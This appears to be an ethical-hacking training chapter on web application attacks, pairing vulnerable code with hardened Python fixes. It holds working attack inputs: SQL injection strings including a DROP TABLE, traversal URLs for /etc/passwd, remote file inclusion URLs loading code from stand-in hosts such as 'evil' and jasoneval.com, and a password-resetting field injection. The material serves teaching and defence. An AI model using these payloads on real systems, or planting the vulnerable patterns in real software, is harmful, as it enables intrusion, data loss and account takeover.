In a session fixation attack, the attacker tricks or lures the user into accessing a legitimate web server using a session ID value chosen by the attacker, so that once the user logs in the attacker already holds an authenticated session ID.
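The attack described above, played out against two login routines, as an added example that is not code from the original courseware. The in-memory session store, the credential table and the user "jason" are assumptions made for the demo; a real application would verify a password hash and persist sessions elsewhere.

```python
import secrets

# Constructed credential table for the demo; a real application compares a
# password hash, never a plaintext value.
USERS = {"jason": "springfield"}


class SessionStore:
    """Minimal in-memory session store (constructed for the demo, not a real framework)."""

    def __init__(self):
        self.sessions = {}                # session_id -> {"user": name or None}

    def new_session(self):
        sid = secrets.token_urlsafe(32)   # unguessable, server-generated ID
        self.sessions[sid] = {"user": None}
        return sid

    def get(self, sid):
        return self.sessions.get(sid)


def login_vulnerable(store, sid, username, password):
    """Vulnerable: authenticates the session the client arrived with and keeps its ID.
    Whoever already knows that ID (the attacker who planted it) now owns a logged-in session."""
    sess = store.get(sid)
    if sess is not None and USERS.get(username) == password:
        sess["user"] = username
    return sid


def login_hardened(store, sid, username, password):
    """Hardened: on successful login, discard the pre-authentication session and issue
    a fresh ID. The ID the attacker planted never becomes an authenticated session."""
    if USERS.get(username) != password:
        return sid                        # failed login: nothing changes
    store.sessions.pop(sid, None)         # invalidate the ID the client presented
    new_sid = store.new_session()
    store.sessions[new_sid]["user"] = username
    return new_sid


def fixation_attack(login):
    """Play the attack out against a given login routine.

    1. The attacker requests the site and receives a valid, unauthenticated session ID.
    2. The attacker gets the victim to use that ID (for example via a link carrying it).
    3. The victim logs in with it.
    4. The attacker presents the planted ID and checks whether it is now logged in as the victim.
    Returns (attacker_hijacked_session, victim_received_new_id).
    """
    store = SessionStore()
    planted = store.new_session()
    victim_sid = login(store, planted, "jason", "springfield")
    planted_sess = store.get(planted)
    hijacked = planted_sess is not None and planted_sess["user"] == "jason"
    return hijacked, victim_sid != planted


if __name__ == "__main__":
    print("vulnerable:", fixation_attack(login_vulnerable))   # (True, False)
    print("hardened:  ", fixation_attack(login_hardened))     # (False, True)
```

The fix is independent of how the ID reached the victim (URL parameter, injected cookie, or a forward): regenerating the identifier at every privilege change means nothing the attacker learned before login is worth anything afterwards.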
Malicious File Execution

Malicious file execution vulnerabilities have been found in many applications. The cause is unchecked input to the web server: because of it, attacker-supplied files are executed and processed on the web server. The attacker can thereby achieve remote code execution, install a rootkit remotely, and in at least some cases take complete control of the system.
Unvalidated Input

• An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc., resulting in data theft and system malfunctioning
• Input validation flaws refer to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers
An input validation flaw refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. Sites try to protect themselves from malicious input through filtering, but the same input can be encoded in many ways, and many HTTP inputs have multiple formats, which makes filtering very difficult. Canonicalization reduces the input to a single standard form before validation and helps defeat such evasion. When web applications rely only on client-side mechanisms for input validation, attackers can easily bypass them. To bypass the security checks, attackers tamper with HTTP requests, URLs, headers, form fields, hidden fields, and query strings. Users' login IDs and other related data stored in cookies also become a source of attack for intruders, who gain access to systems using the information present in them. Methods used by attackers include SQL injection, cross-site scripting (XSS), buffer overflows, format string attacks, cookie poisoning, and hidden field manipulation, all of which can result in data theft and system malfunctioning.
Browser POST request:
    http://juggyboy.com/login.aspx?user=jason&pass=springfield

Modified query (browser input not validated by the web application before it reaches the database):
    string sql = "select * from Users where user='" + User.Text + "' and pwd='" + Password.Text + "'";

Figure 13.5: Unvalidated Input
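The concatenated query from the figure, reproduced in Python against an in-memory SQLite table, as an added example that is not code from the original courseware. The Users table, the sample credentials and the two injection strings are constructed for the demo; the hardened version uses the driver's parameter placeholders.

```python
import sqlite3


def make_db():
    """Constructed in-memory Users table mirroring the figure's query. Plaintext passwords
    are kept only because the figure's query compares them directly; real code stores hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("jason", "springfield"), ("alice", "hunter2")])
    conn.commit()
    return conn


def login_concat(conn, user, pwd):
    """Vulnerable: builds the SQL by string concatenation, exactly as the figure's C# does.
    Whatever the client typed becomes part of the SQL grammar."""
    sql = ("select * from Users where user='" + user +
           "' and pwd='" + pwd + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, user, pwd):
    """Hardened: placeholders hand the values to the driver separately from the statement,
    so quotes and comment markers in the input remain plain data."""
    sql = "select * from Users where user=? and pwd=?"
    return conn.execute(sql, (user, pwd)).fetchone() is not None


def demo():
    """Try a valid login and two classic injections against both query builders."""
    conn = make_db()
    tautology = "' or '1'='1"   # pwd field: closes the quote, appends an always-true clause
    comment = "jason'--"         # user field: closes the quote, comments out the pwd check
    results = {
        "valid_concat": login_concat(conn, "jason", "springfield"),          # True
        "tautology_concat": login_concat(conn, "jason", tautology),          # True: bypassed
        "comment_concat": login_concat(conn, comment, "wrong"),              # True: bypassed
        "valid_param": login_parameterized(conn, "jason", "springfield"),   # True
        "tautology_param": login_parameterized(conn, "jason", tautology),   # False
        "comment_param": login_parameterized(conn, comment, "wrong"),       # False
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print("%-18s %s" % (name, ok))
```

The tautology works because AND binds tighter than OR, so the injected clause turns the WHERE into (user='jason' and pwd='') or ('1'='1'); the comment string simply removes the password check. Neither has any effect on the parameterized query, because the values never pass through the SQL parser.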
Parameter/Form Tampering

• A web parameter tampering attack involves the manipulation of parameters exchanged between client and server in order to modify application data such as user credentials and permissions, price, and quantity of products
• A parameter tampering attack exploits vulnerabilities in integrity and logic validation mechanisms and may result in XSS, SQL injection, etc.
Parameter tampering is a simple form of attack aimed directly at the application's business logic. It takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker simply changes these parameters.

Detailed Description

Serving requested files is the main function of web servers. During a web session, parameters are exchanged between the web browser and the web application in order to maintain information about the client's session, which eliminates the need to maintain a complex database on the server side. URL query strings, form fields, and cookies are used to pass the parameters.

Changed form field values are the best example of parameter tampering. When a user selects a value on an HTML page, it is stored as a form field value and transferred to the web application in an HTTP request. These values may be pre-selected (combo box, check box, radio buttons, etc.), free text, or hidden. An attacker can manipulate any of them. In some cases it is as simple as saving the page, editing the HTML, and reloading the page in the web browser.
Hidden fields that are invisible to the end user carry status information to the web application. For example, consider a product order form that includes the following hidden field:

<input type="hidden" name="price" value="99.90">

Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters used to transfer information between different pages while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the following combo box:

<FORM METHOD=POST ACTION="xferMoney.asp">
Source Account: <SELECT NAME="SrcAcc">
<OPTION VALUE="123456789">******789</OPTION>
<OPTION VALUE="868686868">******868</OPTION></SELECT>
<BR>Amount: <INPUT NAME="Amount" SIZE=20>
<BR>Destination Account: <INPUT NAME="DestAcc" SIZE=40>
<BR><INPUT TYPE=SUBMIT> <INPUT TYPE=RESET>
</FORM>
Bypassing

An attacker may bypass the restriction to these two accounts by adding another option to the HTML page source. The new option appears in the combo box in the web browser, and the attacker can select it.

HTML forms submit their results using one of two methods: GET or POST. With the GET method, all form parameters and their values appear in the query string of the next URL, which the user sees. An attacker may tamper with this query string. For example, consider a web page that allows an authenticated user to select one of his or her accounts from a combo box and debit the account by a fixed amount. When the submit button is pressed in the web browser, the following URL is requested:

http://www.juggybank.com/cust.asp?profile=21&debit=2500

An attacker may change the URL parameters (profile and debit) in order to debit another account:

http://www.juggybank.com/cust.asp?profile=82&debit=1500

There are other URL parameters that an attacker can modify, including attribute parameters and internal modules. Attribute parameters are unique parameters that characterize the behavior of the page being loaded. For example, consider a content-sharing web application that lets the content creator modify content while other users can only view it. The web server checks whether the user who is accessing an entry is the author or not (usually by cookie). An ordinary user will request the following link:

http://www.juggybank.com/stat.asp?pg=531&status=view

An attacker can modify the status parameter to "delete" in order to obtain delete permission for the content:

http://www.juggybank.com/stat.asp?pg=147&status=delete

Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users, as well as to parameters that expose developer and debugging information.
Tampering with the URL parameters:
    http://www.juggybank.com/cust.asp?profile=21&debit=2500
    http://www.juggybank.com/cust.asp?profile=82&debit=1500

Other parameters can be changed, including attribute parameters:
    http://www.juggybank.com/stat.asp?pg=531&status=view
    http://www.juggybank.com/stat.asp?pg=147&status=delete

FIGURE 13.6: Form Tampering
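The two tampering cases above (the hidden price field and the profile parameter in the juggybank URLs) handled server-side both ways, as an added example that is not code from the original courseware. The catalog, the account table, the ownership of profiles 21 and 82, and the session user "jason" are assumptions made for the demo.

```python
from urllib.parse import parse_qs, urlparse

# Constructed server-side data for the demo (not from the original page).
# Prices are in cents so the arithmetic stays exact.
CATALOG = {"widget": 9990}


def fresh_accounts():
    """Account table keyed by the 'profile' parameter seen in the juggybank URLs."""
    return {"21": {"owner": "jason", "balance": 5000},
            "82": {"owner": "alice", "balance": 3000}}


def order_total_trusting_client(form):
    """Vulnerable: uses the hidden 'price' field exactly as the browser returned it."""
    return int(form["price"]) * int(form["qty"])


def order_total_server_side(form):
    """Hardened: the client may only name the item; the price is looked up server-side."""
    item = form["item"]
    if item not in CATALOG:
        raise ValueError("unknown item")
    qty = int(form["qty"])
    if qty < 1:
        raise ValueError("quantity must be positive")
    return CATALOG[item] * qty


def _parse(url):
    query = parse_qs(urlparse(url).query)
    return query["profile"][0], int(query["debit"][0])


def debit_trusting_url(accounts, url, session_user):
    """Vulnerable: debits whichever 'profile' appears in the query string."""
    profile, amount = _parse(url)
    accounts[profile]["balance"] -= amount
    return profile


def debit_checked(accounts, url, session_user):
    """Hardened: the profile must belong to the authenticated user and the amount must be sane."""
    profile, amount = _parse(url)
    acct = accounts.get(profile)
    if acct is None or acct["owner"] != session_user:
        raise PermissionError("profile %s is not owned by %s" % (profile, session_user))
    if amount <= 0 or amount > acct["balance"]:
        raise ValueError("invalid debit amount")
    acct["balance"] -= amount
    return profile


def demo():
    """Replay the figure's tampering cases against both versions of each handler."""
    out = {}
    form = {"item": "widget", "price": "1", "qty": "3"}     # hidden price edited from 9990 to 1
    out["trusting_total"] = order_total_trusting_client(form)   # 3 cents
    out["server_total"] = order_total_server_side(form)         # 29970 cents

    tampered = "http://www.juggybank.com/cust.asp?profile=82&debit=1500"  # jason targets alice
    accts = fresh_accounts()
    debit_trusting_url(accts, tampered, "jason")
    out["alice_after_trusting"] = accts["82"]["balance"]        # 1500: another user's money moved

    accts = fresh_accounts()
    try:
        debit_checked(accts, tampered, "jason")
        out["checked_rejected"] = False
    except PermissionError:
        out["checked_rejected"] = True                          # True
    out["alice_after_checked"] = accts["82"]["balance"]         # 3000: untouched

    own = "http://www.juggybank.com/cust.asp?profile=21&debit=2500"
    debit_checked(accts, own, "jason")
    out["jason_after_checked"] = accts["21"]["balance"]         # 2500: legitimate debit succeeds
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The pattern in both fixes is the same: anything the client is allowed to send is treated as a selector, never as the authoritative value, and the server resolves that selector against data it controls (the catalog, or the accounts bound to the authenticated session).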
Directory Traversal

When access is possible outside the defined application, there is a possibility of unintended information disclosure or modification. Complex applications consist of components and data that are typically spread over multiple directories, and the application traverses these directories to locate and execute its legitimate parts. A directory traversal (forceful browsing) attack occurs when the attacker is able to browse directories and files outside the application's normal access. Such an attack exposes the directory structure of the application, and often of the underlying web server and operating system. With this level of access to the web application architecture, an attacker can:

• Enumerate the contents of files and directories
• Access pages that otherwise require authentication (and possibly payment)
• Gain secret knowledge of the application and its construction
• Discover user IDs and passwords buried in hidden files
• Locate source code and other interesting files left on the server
• View sensitive data, such as customer information
The following example uses "../" sequences to back up several directories and obtain a file containing a backup of the web application:
http://www.targetsite.com/../../../sitebackup.zip
This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user account information:
http://www.targetsite.com/../../../../etc/passwd
Let us consider another example where an attacker tries to access files located outside the web publishing directory using directory traversal:
http://www.juggyboy.com/process.aspx=../../some dir/some file
http://www.juggyboy.com/../../../../some dir/some file
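The server-side check that defeats the requests above, written in Python as an added illustration (it is not code from the module): the requested path is percent-decoded, normalised and anchored under the web root, and anything that resolves outside the root is refused. The web root /var/www/app/public and the access-log lines are constructed for the example. The same containment check, run over access logs, doubles as a simple detection rule for traversal attempts.

```python
import posixpath
from typing import List, Optional
from urllib.parse import unquote

# Hypothetical web root used for the example; a real deployment would use
# the directory the application is actually allowed to serve from.
WEB_ROOT = "/var/www/app/public"


def resolve_under_root(requested: str, root: str = WEB_ROOT) -> Optional[str]:
    """Map a user-supplied path to an absolute path under ``root``.

    Returns the resolved path when it stays inside ``root``; returns None when
    the request would escape it (directory traversal / forceful browsing).
    """
    # Decode percent-encoding twice so %2e%2e and the double-encoded
    # %252e%252e both collapse to ".." before the check runs.
    decoded = unquote(unquote(requested))
    # Treat backslashes as separators and make the path relative to the root.
    decoded = decoded.replace("\\", "/").lstrip("/")
    # Collapse "." and ".." lexically, then anchor under the root.
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # Containment check: the result must be the root itself or live below it.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed access-log lines (method, path, protocol), not real traffic.
SAMPLE_ACCESS_LOG = [
    "GET /index.html HTTP/1.1",
    "GET /../../../sitebackup.zip HTTP/1.1",
    "GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1",
    "GET /images/logo.png HTTP/1.1",
]


def flag_traversal_requests(log_lines: List[str], root: str = WEB_ROOT) -> List[str]:
    """Return the request paths in ``log_lines`` that would escape ``root``.

    Running the containment check over access logs turns it into a
    detection rule for traversal attempts, encoded or not.
    """
    flagged = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        if resolve_under_root(parts[1], root) is None:
            flagged.append(parts[1])
    return flagged


if __name__ == "__main__":
    for line in SAMPLE_ACCESS_LOG:
        path = line.split()[1]
        print(path, "->", resolve_under_root(path))
    print("flagged:", flag_traversal_requests(SAMPLE_ACCESS_LOG))
```

The check is deliberately lexical (no file system access), so it rejects a request before any file is opened; an application that also follows symbolic links should additionally compare the real path of the opened file against the root.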
The pictorial representation of a directory traversal attack is shown as follows:
FIGURE 13.7: Directory Traversal (the attacker sends a request for /../../../etc/passwd to a server running vulnerable PHP code, and the server returns the contents of the password file)
Security Misconfiguration
Easy Exploitation: Using misconfiguration vulnerabilities, attackers gain unauthorized access to default accounts, read unused pages, exploit unpatched flaws, and read or write unprotected files and directories, etc.
Common Prevalence: Security misconfiguration can occur at any level of an application stack, including the platform, web server, application server, framework, and custom code.
Example:
• The application server admin console is automatically installed and not removed
• Default accounts are not changed
• Attacker discovers the standard admin pages on the server, logs in with default passwords, and takes over
Security Misconfiguration
Developers and network administrators should check that the entire stack is configured properly, because security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. For instance, if the server is not configured properly, it results in various problems that can affect the security of a website. The problems that lead to such instances include server software flaws, unpatched security flaws, enabling unnecessary services, and improper authentication. A few of these problems can be detected easily with the help of automated scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access. All unnecessary and unsafe features have to be taken care of, and it proves very beneficial if they are completely disabled so that outsiders cannot make use of them for malicious attacks. All application-based files have to be protected through proper authentication and strong security methods, or crucial information can be leaked to attackers.
Examples of unnecessary features that should be disabled or changed include:
• The application server admin console is automatically installed and not removed
• Default accounts are not changed
• Attacker discovers the standard admin pages on the server, logs in with default passwords, and takes over
Injection Flaws
• Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query
• Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access
• Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. and can be easily discovered by application vulnerability scanners and fuzzers
SQL Injection: It involves the injection of malicious SQL queries into user input forms
Command Injection: It involves the injection of malicious code through a web application
LDAP Injection: It involves the injection of malicious LDAP statements
Injection Flaws
Injection flaws are loopholes in a web application that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in loss or corruption of data, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. These flaws can be detected easily by application vulnerability scanners and fuzzers. By exploiting the flaws in the web application, the attacker can read, write, delete, and update any data, whether or not it is relevant to that particular application. There are many types of injection flaws; some of them are as follows:
SQL injection
SQL injection is the most common website vulnerability on the Internet. It is the technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. In this attack, the attacker injects malicious SQL queries into the user input form, usually either to gain unauthorized access to a database or to retrieve information directly from the database.
Command injection
Command injection flaws are another type of web application vulnerability.
These flaws are highly dangerous. In this type of attack, the attacker injects malicious code via a web application.
LDAP injection
LDAP injection is an attack method in which a website that constructs LDAP statements from user-supplied input is exploited for launching attacks. When an application fails to sanitize user input, the LDAP statement can be modified with the help of a local proxy. This in turn results in the execution of arbitrary commands, such as granting access to unauthorized queries and altering the content inside the LDAP tree.
SQL Injection Attacks
• SQL injection attacks use a series of malicious SQL queries to directly manipulate the database
• An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to the valuable data
• SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches
SQL injection vulnerable server code:
<?php
function save_email($user, $message)
{
    // $user and $message arrive straight from the request and are pasted
    // into the SQL text, so a quote in either one changes the statement
    $sql = "INSERT INTO Messages (
        user, message
    ) VALUES (
        '$user', '$message'
    )";
    return mysql_query($sql);
}
?>
Attacker input sent from the web browser; when this code sends it to the database server, it drops the Messages table:
test');DROP TABLE Messages;--
Attacker input that inserts spammy data on behalf of other users:
test'),('user2','I am Jason'),('user3','You are hacked
Note: For complete coverage of SQL injection concepts and techniques, refer to Module 14: SQL Injection
SQL Injection Attacks
SQL injection attacks use command sequences from Structured Query Language (SQL) statements to control database data directly. Applications often use SQL statements to authenticate users to the application, validate roles and access levels, store and obtain information for the application and user, and link to other data sources. Using SQL injection methods, an attacker can use a vulnerable web application to avoid normal security measures and obtain direct access to valuable data.
The reason why SQL injection attacks work is that the application does not properly validate input before passing it to a SQL statement. For example, the following SQL statement,
SELECT * FROM tablename WHERE UserID = 2302
becomes the following with a simple SQL injection attack:
SELECT * FROM tablename WHERE UserID = 2302 OR 1=1
The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all user ID values from the database. SQL injection attacks can often be entered from the address bar, from within application fields, and through queries and searches. SQL injection attacks can allow an attacker to:
• Log in to the application without supplying valid credentials
• Perform queries against data in the database, often even data to which the application would not normally have access
• Modify the database contents, or drop the database altogether
• Use the trust relationships established between the web application components to access other databases
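The two attacks described above, the "OR 1=1" tautology and the stacked DROP TABLE, reproduced in Python against an in-memory SQLite database as an added example (not code from the module), with the vulnerable string-building form of each query beside its parameterised form. The Messages table, its two rows and the attacker inputs are constructed for the demonstration; executescript() stands in for a database driver that accepts several statements in one call, which is what the PHP mysql_query() example relies on.

```python
import sqlite3


def fresh_db() -> sqlite3.Connection:
    """Constructed in-memory database with the module's Messages table and two sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Messages (id INTEGER PRIMARY KEY, user TEXT, message TEXT)")
    conn.executemany(
        "INSERT INTO Messages (user, message) VALUES (?, ?)",
        [("alice", "hello"), ("bob", "hi there")],
    )
    conn.commit()
    return conn


def messages_by_id_vulnerable(conn, user_id):
    # Same flaw as the page's example: the value is pasted into the SQL text,
    # so "1 OR 1=1" becomes part of the WHERE clause.
    sql = f"SELECT user, message FROM Messages WHERE id = {user_id}"
    return conn.execute(sql).fetchall()


def messages_by_id_safe(conn, user_id):
    # Parameterised: the driver sends the value separately from the SQL text,
    # so "1 OR 1=1" is compared with id as a literal value and matches nothing.
    return conn.execute("SELECT user, message FROM Messages WHERE id = ?", (user_id,)).fetchall()


def save_email_vulnerable(conn, user, message):
    # Python counterpart of the PHP save_email(): string concatenation.
    sql = f"INSERT INTO Messages (user, message) VALUES ('{user}', '{message}')"
    conn.executescript(sql)


def save_email_safe(conn, user, message):
    # Quotes and semicolons in the input are stored as data, never parsed as SQL.
    conn.execute("INSERT INTO Messages (user, message) VALUES (?, ?)", (user, message))
    conn.commit()


def table_exists(conn, name):
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


# Constructed attacker inputs with the same shape as the module's examples.
PAYLOAD_TAUTOLOGY = "1 OR 1=1"
PAYLOAD_STACKED = "x'); DROP TABLE Messages;--"


def demo() -> dict:
    """Run both versions of each operation and report what happened."""
    results = {}
    conn = fresh_db()
    results["tautology_vulnerable_rows"] = len(messages_by_id_vulnerable(conn, PAYLOAD_TAUTOLOGY))
    results["tautology_safe_rows"] = len(messages_by_id_safe(conn, PAYLOAD_TAUTOLOGY))
    save_email_safe(conn, "test", PAYLOAD_STACKED)
    stored = conn.execute("SELECT message FROM Messages WHERE user = 'test'").fetchone()[0]
    results["safe_stored_literally"] = stored == PAYLOAD_STACKED
    results["safe_table_intact"] = table_exists(conn, "Messages")
    save_email_vulnerable(conn, "test", PAYLOAD_STACKED)
    results["vulnerable_table_intact"] = table_exists(conn, "Messages")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable lookup returns every row (the WHERE clause became a tautology), the safe lookup returns none; the safe insert stores the DROP TABLE text as an ordinary message and leaves the table in place, while the vulnerable insert executes it.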
SQL injection vulnerable server code:
<?php
function save_email($user, $message)
{
    // $user and $message arrive straight from the request and are pasted
    // into the SQL text, so a quote in either one changes the statement
    $sql = "INSERT INTO Messages (
        user, message
    ) VALUES (
        '$user', '$message'
    )";
    return mysql_query($sql);
}
?>
Attacker input sent from the web browser; when this code sends it to the database server, it drops the Messages table:
test');DROP TABLE Messages;--
Attacker input that inserts spammy data on behalf of other users:
test'),('user2','I am Jason'),('user3','You are hacked
FIGURE 13.8: SQL Injection Attacks (the attacker submits the input above through a web browser over the Internet; the vulnerable server code passes it to the database)
Command Injection Attacks
Shell Injection
• An attacker tries to craft an input string to gain shell access to a web server
• Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs
HTML Embedding
• This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application
• In HTML embedding attacks, user input to a web script is placed into the output HTML, without being checked for HTML code or scripting
File Injection
• The attacker exploits this vulnerability and injects malicious code into system files
• http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?
Command Injection Attacks
Command injection flaws allow attackers to pass malicious code to different systems via a web application. The attacks include calls to the operating system over system calls, use of external programs over shell commands, and calls to backend databases over SQL. Scripts written in Perl, Python, and other languages execute and insert into poorly designed web applications. If a web application uses any type of interpreter, attacks are inserted to inflict damage.
To perform functions, web applications must use operating system features and external programs. Although many programs are invoked externally, the most frequently used program is Sendmail. When a piece of information is passed through the HTTP external request, it must be carefully scrubbed, or the attacker can insert special characters, malicious commands, and command modifiers into the information. The web application then blindly passes these characters to the external system for execution. Inserting SQL is dangerous and rather widespread, as it is a form of command injection. Command injection attacks are easy to carry out and discover, but they are tough to understand.
Shell Injection
To complete various functionalities, web applications use various applications and programs, such as sending an email by using the UNIX sendmail program. There is a chance that an attacker may inject code into these programs. This kind of attack is dangerous, especially to web page security. These injections allow intruders to perform various types of malicious attacks against the user's server. An attacker tries to craft an input string to gain shell access to a web server.
Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs.
HTML Embedding
This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML embedding attacks, user input to a web script is placed into the output HTML, without being checked for HTML code or scripting.
File Injection
The attacker exploits this vulnerability and injects malicious code into system files:
http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit
Users are allowed to upload various files on the server through various applications, and those files can be accessed through the Internet from any part of the world. If the uploaded file ends with a .php extension and any user requests it, the application interprets it as a PHP script and executes it. This allows an attacker to perform arbitrary commands.
Command Injection Example
Attacker launching a code injection attack against http://juggyboy/cgi-bin/lspro/lspro.cgi?hit_out=1036
Form fields submitted to JuggyBoy.com:
User Name: Addison
Email Address: addi@juggyboy.com
Site URL: www.juggyboy.com
Banner URL: www.juggyboy.com/banner.gif||newpassword||1036|60|468
Password: newpassword
Malicious code: www.juggyboy.com/banner.gif||newpassword||1036|60|468
Poor input validation at the server script was exploited in this attack, which uses the database INSERT and UPDATE record commands
• An attacker enters malicious code (account number) with a new password
• The last two sets of numbers are the banner size
• Once the attacker clicks the submit button, the password for the account 1036 is changed to "newpassword"
• The server script assumes that only the URL of the banner image file is inserted into that field
Command Injection Example
The following is an example of command injection. To perform a command injection attack, the attacker first enters malicious code (account number) with a new password. The last two sets of numbers are the banner size. Once the attacker clicks the submit button, the password for the account 1036 is changed to "newpassword." The server script assumes that only the URL of the banner image file is inserted into that field.
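Both injection shapes in this section, the shell command built from a request value (the sendmail case) and the delimited record the banner example abuses, come down to the same defence: validate against a strict allowlist and keep user data out of the interpreter's syntax. The following Python is an added example, not the module's or any product's code; the sendmail path /usr/sbin/sendmail, the record layout (banner_url|password|account|width|height, mirroring the slide) and all inputs are assumptions for the demonstration.

```python
import re
from typing import Callable, List

# --- Shell injection ---------------------------------------------------------
# Strict allowlist for an address handed to sendmail: refuse anything else
# rather than trying to strip "bad" characters out of it.
EMAIL_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
SHELL_METACHARS = frozenset(";|&`$<>()\n\r'\"\\")
SENDMAIL = "/usr/sbin/sendmail"  # assumed path, for illustration only


def contains_shell_metachars(value: str) -> bool:
    """Detection check: does the input carry characters a shell would act on?"""
    return any(ch in SHELL_METACHARS for ch in value)


def sendmail_argv(recipient: str) -> List[str]:
    """Build the sendmail command as an argv list, never as a shell string.

    Handing a list to the process API (subprocess.run without shell=True)
    makes the recipient a single argument, so metacharacters in it are data
    rather than commands; the allowlist rejects them anyway.
    """
    if not EMAIL_RE.fullmatch(recipient):
        raise ValueError(f"recipient rejected: {recipient!r}")
    return [SENDMAIL, "-oi", recipient]


# --- Delimited-record injection (the banner/password example) ----------------
RECORD_SEP = "|"
RECORD_FIELDS = ("banner_url", "password", "account", "width", "height")  # assumed layout
BANNER_URL_RE = re.compile(r"(https?://)?[A-Za-z0-9.-]+(/[A-Za-z0-9._-]+)*/[A-Za-z0-9._-]+\.(gif|png|jpg)")


def validate_banner_url(value: str) -> str:
    """Accept only a plain image URL; the record separator is refused outright."""
    if RECORD_SEP in value or not BANNER_URL_RE.fullmatch(value):
        raise ValueError(f"banner URL rejected: {value!r}")
    return value


def build_record(banner_url, password, account, width, height) -> str:
    """Assemble the stored record from server-validated fields only."""
    fields = [validate_banner_url(banner_url), str(password), str(account), str(width), str(height)]
    if any(RECORD_SEP in f for f in fields):
        raise ValueError("separator inside a field")
    return RECORD_SEP.join(fields)


def parse_record(record: str) -> dict:
    """Parse a stored record, refusing rows whose field count is wrong,
    which is the symptom an injected separator leaves behind."""
    parts = record.split(RECORD_SEP)
    if len(parts) != len(RECORD_FIELDS):
        raise ValueError(f"malformed record: expected {len(RECORD_FIELDS)} fields, got {len(parts)}")
    return dict(zip(RECORD_FIELDS, parts))


def rejects(check: Callable[[str], object], value: str) -> bool:
    """True when ``check`` refuses ``value`` with ValueError."""
    try:
        check(value)
    except ValueError:
        return True
    return False
```

The field-count check in parse_record is also a useful audit query over existing data: records with the wrong number of separators are the trace an earlier injection would have left.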
FIGURE 13.9: Command Injection Example (the attacker submits the form at http://juggyboy/cgi-bin/lspro/lspro.cgi?hit_out=1036 with the Banner URL field set to www.juggyboy.com/banner.gif||newpassword||1036|60|468; poor input validation at the server script, which uses the database INSERT and UPDATE record commands, was exploited in this attack)
File Injection Attack
Vulnerable server code:
<?php
$drink = 'coke';
if (isset($_GET['DRINK']))
    $drink = $_GET['DRINK'];
// the request parameter chooses the file to include, so a remote URL
// or a traversal string is handed straight to require()
require($drink . '.php');
?>
Client code running in a browser:
<form method="get">
<select name="DRINK">
<option value="pepsi">pepsi</option>
<option value="coke">coke</option>
</select>
<input type="submit">
</form>
File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system
The attacker injects a remotely hosted file at www.jasoneval.com containing an exploit:
http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?
File Injection Attack
Users are allowed to upload various files on the server through various applications, and those files can be accessed through the Internet from anywhere in the world. If the uploaded file ends with a .php extension and any user requests it, the application interprets it as a PHP script and executes it. This allows an attacker to perform arbitrary commands. File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system. Consider the following client code running in a browser:
<form method="get">
<select name="DRINK">
<option value="pepsi">pepsi</option>
<option value="coke">coke</option>
</select>
<input type="submit">
</form>
Vulnerable PHP code
<?php
$drink = 'coke';
if (isset($_GET['DRINK']))
    $drink = $_GET['DRINK'];
// the request parameter chooses the file to include, so a remote URL
// or a traversal string is handed straight to require()
require($drink . '.php');
?>
To exploit the vulnerable PHP code, the attacker injects a remotely hosted file at www.jasoneval.com containing an exploit.
Exploit code
http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?
